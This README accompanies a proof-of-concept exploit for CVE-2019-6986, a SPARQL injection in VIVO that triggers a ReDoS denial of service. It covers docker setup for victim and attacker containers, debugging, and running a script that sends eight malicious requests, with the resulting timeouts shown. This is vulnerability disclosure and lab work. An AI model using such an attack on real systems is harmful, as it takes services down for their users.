This directory contains a proof-of-concept exploit for a SPARQL injection vulnerability in VIVO. This vulnerability has been assigned CVE-2019-6986. The exploit targets this line of code. It triggers a denial of service by generating a query containing a ReDoS.
Create a docker network bridge, to simulate a network with two separate computers.
docker network create -d bridge --subnet 172.18.0.0/16 vivo-demo-network
Build the docker image:
docker build vivo-server -t vivo-server --build-arg UID=`id -u`
Start the container:
docker run --rm --network vivo-demo-network --ip=172.18.0.10 -h vivo-server --publish 8000:8000 --publish 8080:8080 -i -t vivo-server
Inside the container, start VIVO.
sudo ./init_mysql.sh # password is: x
/usr/local/tomcat/bin/catalina.sh start
It seems to take Vivo at least 10 minutes to initialize itself. You can monitor its progress in this log file:
/usr/local/tomcat/logs/vivo.all.log
Vivo isn't ready until you see lines like this at the bottom of vivo.all.log:
2019-01-17 22:19:31,004 INFO [IndexHistory] STARTUP, 1/17/19, 10:17 PM, []
2019-01-17 22:19:31,008 INFO [FreemarkerSetup] Freemarker templating system initialized.
2019-01-17 22:19:31,122 INFO [VClassGroupCache] VClassGroupCache added to context
2019-01-17 22:19:31,123 INFO [VClassGroupCache] VClassGroupCache set to listen to events from IndexBuilder
2019-01-17 22:19:31,126 INFO [StartupManager] Called 'contextInitialized' on all listeners.
2019-01-17 22:19:31,330 INFO [JSessionStripFilter] Filtering: no jsessionids will be generated.
At this point, you can check that Vivo is running by visiting http://127.0.0.1:8080/vivo in your browser. (We exposed port 8080 on the docker container.) To login, the username is vivo_root@mydomain.edu and the password is rootPassword.
You can debug the application with Eclipse, even when it is running in docker. To do this you need to also bind port 8000 when you start docker. (This was already included in the instructions above.)
Inside docker, start tomcat like this:
export JPDA_ADDRESS=0.0.0.0:8000
export JPDA_TRANSPORT=dt_socket
/usr/local/tomcat/bin/catalina.sh jpda start
Next you need to get the VIVO source code on your main machine and build it. The purpose of this is primarily to get maven to download all the dependencies so that Eclipse can see them.
git clone https://github.com/vivo-project/VIVO.git
git clone https://github.com/vivo-project/Vitro.git
cd VIVO/
mvn package -DskipTests
mvn eclipse:eclipse
Then import the VIVO and Vitro projects into Eclipse. Inside Eclipse, create a remote debug configuration, connecting to localhost:8000 (which is the default.)
Build the docker image:
docker build vivo-attacker -t vivo-attacker
Start the container:
docker run --rm --network vivo-demo-network --ip=172.18.0.11 -h vivo-attacker -i -t vivo-attacker
Inside the container, use post.sh to send 8 malicious request to VIVO.
./post.sh
The curl command inside post.sh never receives a response from the VIVO server, so you will see 8 timeout error messages on the command line:
curl: (28) Operation timed out after 1001 milliseconds with 0 bytes received
curl: (28) Operation timed out after 1001 milliseconds with 0 bytes received
curl: (28) Operation timed out after 1001 milliseconds with 0 bytes received
curl: (28) Operation timed out after 1001 milliseconds with 0 bytes received
curl: (28) Operation timed out after 1001 milliseconds with 0 bytes received
curl: (28) Operation timed out after 1001 milliseconds with 0 bytes received
curl: (28) Operation timed out after 1001 milliseconds with 0 bytes received
curl: (28) Operation timed out after 1001 milliseconds with 0 bytes received
VIVO is now hogging 8 CPU cores.